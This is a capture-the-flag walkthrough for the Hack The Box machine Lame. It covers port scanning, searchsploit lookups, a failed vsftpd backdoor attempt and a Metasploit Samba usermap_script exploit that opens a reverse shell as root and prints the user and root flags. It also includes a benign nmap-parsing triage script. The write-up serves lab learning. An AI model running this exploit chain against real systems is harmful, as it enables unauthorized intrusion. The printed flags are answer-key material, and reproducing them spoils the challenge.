This is the walkthrough for the Hack The Box machine Lame. I am writing this walkthrough based on how I got into the machine. It should be useful for people who want to know how to approach a new machine.
Machine Name: Lame
IP Address: 10.10.10.3
For information gathering I used Nmap, the enumeration tool, to scan for the open ports and the services running on the target machine.
Command: nmap -p 1-65535 -T4 -A -v 10.10.10.3
This command scans all TCP ports from 1 to 65535 aggressively. Some people run the normal scan, but that covers only ports 1 to 1000. On some machines there are services running on uncommon ports, so we have to scan all the ports and make sure none are missed.
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
From the nmap results we know that the target machine has 5 open ports running different services. On 21/ftp it runs an FTP service that allows anonymous login.
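As an added example (not part of the original walkthrough), here is a small Python triage script that parses nmap normal output like the block above, attaches the NSE script lines to their port, and flags what a defender reviewing their own scan would act on: anonymous FTP, a version string this walkthrough identifies as exploitable, and services where nmap could only give a version range. The sample input is a constructed copy of the scan output above; the KNOWN_BAD table is an assumption standing in for a real vulnerability feed.

```python
import re

# Constructed sample: the scan output shown above, as saved by `nmap -oN`.
SCAN_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
|      vsFTPd 2.3.4 - secure, fast, stable
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed watchlist: only the version this walkthrough names (searchsploit 17491).
KNOWN_BAD = {"vsftpd 2.3.4": "backdoor command execution (exploit-db 17491)"}


def parse_nmap_ports(text):
    """Parse nmap normal output into one dict per port line, attaching NSE lines."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "scripts": []})
        elif line.startswith("|") and ports:
            # '|' / '|_' prefixed lines belong to the most recent port
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


def triage(ports):
    """Return (port, finding) pairs a defender should follow up on."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        if any("Anonymous FTP login allowed" in s for s in p["scripts"]):
            findings.append((p["port"], "anonymous FTP login allowed"))
        if p["version"] in KNOWN_BAD:
            findings.append((p["port"], KNOWN_BAD[p["version"]]))
        # nmap gave only a range such as "3.X - 4.X": the exact build is unknown
        if re.search(r"\d\.X", p["version"]):
            findings.append((p["port"], "version is a range; confirm exact build"))
    return findings


for port, issue in triage(parse_nmap_ports(SCAN_OUTPUT)):
    print(f"[!] {port}/tcp: {issue}")
```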
Let's check port 21/ftp.
┌─[root@parrot]─[/home/user]
└──╼ #ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:user): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd /
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
From FTP we couldn't get any access, since the FTP service is running with restrictions. From information gathering we already know that the FTP service is vsftpd 2.3.4. Let's try to exploit this service.
For that we have to check whether this version has any known exploit, so I used searchsploit.
┌─[root@parrot]─[/home/user]
└──╼ #searchsploit vsftpd 2.3.4
------------------------------------------------------------- ----------------------------------------
 Exploit Title                                               |  Path
                                                             | (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)        | exploits/unix/remote/17491.rb
------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Nice, we have an exploit for this vulnerability and it is already in Metasploit. So I used the exploit “unix/ftp/vsftpd_234_backdoor”.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
The exploit doesn't seem to work, so let's enumerate the machine further. We already know that the target machine has other open ports; let's take 445/SMB. But we don't know the exact version of the SMB service. For that I used the Metasploit auxiliary module “auxiliary/scanner/smb/smb_version”.
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.3:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 10.10.10.3:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
After running this module we found that the target machine is running Samba version 3.0.20. Let's check this version in searchsploit.
┌─[root@parrot]─[/home/user]
└──╼ #searchsploit samba 3.0.20
------------------------------------------------------------- ----------------------------------------
 Exploit Title                                               |  Path
                                                             | (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Ex | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                        | exploits/linux/remote/7701.txt
------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
We found the ‘Username’ map script’ Command Execution exploit. Let's use this exploit in Metasploit.
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.6:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ycX5yCHbmWF2Ud9B;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ycX5yCHbmWF2Ud9B\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.3:36697) at 2019-10-24 22:01:40 -0400
With the exploit “multi/samba/usermap_script” we got a root shell on the target machine. Let's get the flags.
whoami
root
/home/makis
cat user.txt
69454a937d94f5f0225ea00acd2e84c5
pwd
/root
cat root.txt
92caac3be140ef409e45721348a4e9df
We found both the user flag and the root flag. That's all. 🙂